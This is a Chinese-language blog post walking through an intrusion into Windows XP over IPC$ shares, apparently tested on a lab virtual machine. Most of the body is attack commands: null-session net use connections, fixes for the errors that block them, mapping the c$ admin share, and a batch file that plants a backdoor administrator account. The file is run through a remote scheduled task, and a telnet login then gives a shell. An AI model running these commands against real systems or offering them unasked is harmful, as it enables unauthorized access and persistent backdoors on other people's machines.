1674天 博客通用头像 Edwiin

本人熟练掌握linux,windows的开关机,擅长nfs,samba,ftp,dhcp,bind,apache,mail等各项服务的安装与卸载,精通shell,mysql,iptables,selinux等单词的拼写,了解虚拟化,存储,集群等相关汉字的书写。

利用IPC$共享入侵windowsXP

发布于 4年前 / 1.5k 次围观 / 0 条评论 / Windows / Edwiin
本文最后更新于2017-4-14,已超过 1 个月没有更新,如果文章内容或图片资源失效,请【留言反馈】,我会及时处理,谢谢!
测试环境:主机(windows XP sp3)与windows XP sp2虚拟机)
   通过IPC$与windowsXP建立连接,在现在的绝大多数的XP操作系统中总是会出现问题。以下如何解决在建立IPC$出现的一系列问题IPC$(Internet process connection),通常很多的机子的默认共享都是打开的!在cmd下使用net share命令是不是发现有很多$,“ipc$ admin$ ,c$ ,d$.....”(很危险啊)。
现在进入正题:



出现53错误:找不到网络路径,(目标主机打开了系统防火墙或者其他防火墙软件,解决:关闭目标防火墙
出现1326错误:

1)net use \\目标IP\ipc$ "" /user:"administrator"进行连接,报告系统发生1326错误,登陆失败:未知用户名或密码错误。检查一下我们的命令是否错误或者用户名错误。结果发现无错。

2)在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会
把网络连接权限都归为 guest连接,是无法访问IPC$等管理共享的.结果发现这个错误,纠正。

紧接着可能出现1327错误:登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板管理工具本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".



映射对方默认共享c盘:net use z: \\目标IP\c$



在我的电脑中会出现网络驱动器



建立ipc$告一段落,删除ipc$连接:net sue \\目标IP\ipc$ /del

在此基础上在目标电脑上留下后门账号:
编写一个批处理文件,并拷贝到对方的电脑上,然后增加计划任务执行批处理文件;
批处理命令:(保存为adduser.bat
net user nebulastest 123456 /add //增加用户nebulastest,密码123456
net localgroup administrators nebulastest /add //为用户nebulastest赋予管理权限

然后在本机上执行命令(已经建立IPC$连接):copy adduser.bat \\目标IP\c$
接着查看目标电脑时间:net time \\目标IP
随后为目标电脑增加计划任务:at \\目标IP 执行时间 c:\adduser.bat



删除当前IPC$链接,使用新用户和新密码建立IPC$链接,以测试时候建立账号成功。
net use \\目标IP\ipc$ "123456" /user:"nebulastest"




(前提:目标电脑已经开启telnet服务

双击“telnet服务”-----选择“自动”-----点击“启动”



命令行输入:telnet 目标IP
之后弹出远程登录对话框,选择Y,输入用户名(后门账户,密码
输入密码不会现在但是回车后会自动验证是否密码正确



下图已经输入密码但是不会显示:



登陆后的界面:



大功告成,获得目标主机shell

全站顶部广告位

  • 支付宝赞助图片
  • 微信赞助图片
  • QQ赞助图片
头像
描述: 还好有你,再见如初。

Press Space to start